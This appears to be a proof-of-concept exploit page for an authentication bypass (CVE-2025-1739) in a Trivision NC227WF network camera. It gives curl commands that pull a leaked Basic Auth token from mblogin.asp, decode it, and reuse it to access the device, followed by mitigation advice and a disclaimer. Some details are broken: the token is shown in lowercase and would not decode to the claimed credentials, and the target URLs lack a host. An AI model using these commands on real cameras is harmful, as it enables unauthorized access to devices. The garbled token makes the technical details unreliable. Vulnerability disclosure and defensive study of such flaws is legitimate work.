## https://sploitus.com/exploit?id=0C96A29F-98F9-59CC-AC91-C35E0E2FF2E1
# CVE-2025-1738 & CVE-2025-1739 โ Trivision Camera NC227WF PoC
## ๐ Overview
| CVE | CVSS v3.1 | Score | CWE | Type |
|---|---|---|---|---|
| CVE-2025-1739 | AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N | 7.1 | CWE-288 | Authentication Bypass via Basic Auth Leak |
---
## ๐ CVE-2025-1739 โ Basic Auth Code Exposure / Auth Bypass (CWE-288)
### Description
The camera leaks a **valid Base64-encoded Basic Authentication token** through the `mblogin.asp` endpoint. This token can be trivially decoded and reused to gain unauthorized access to the device โ no password knowledge required.
- **Attack Vector:** Adjacent Network (AV:A)
- **CVSS Score:** 7.1
- **CWE:** CWE-288 (Authentication Bypass Using an Alternate Path or Channel)
### Payload
```bash
curl -u admin:whatever http://: --request-target en/mobile/mblogin.asp
```
### Example Response
The response contains a valid Basic Auth token:
```
ywrtaw46vw5ndwvzc2fibguxmjmh
```
### Decoding the Token
```bash
echo "ywrtaw46vw5ndwvzc2fibguxmjmh" | base64 -d
# Output: admin:unguessable123!
```
### Reusing the Token
```bash
curl -H "Authorization: Basic ywrtaw46vw5ndwvzc2fibguxmjmh" http://:/
```
---
## ๐ก๏ธ Mitigation
- **Upgrade firmware** if a patched version is available from Trivision.
- **Isolate the camera** on a dedicated VLAN with no external access.
- **Firewall** the camera's management port from untrusted network segments.
- **Change default credentials** and rotate passwords regularly.
- Monitor for unexpected access to `activex_pal.asp` and `mblogin.asp`.
## โ๏ธ Disclaimer
This repository is for **educational and authorized security research only**. The authors are not responsible for any misuse. Always obtain explicit permission before testing any device.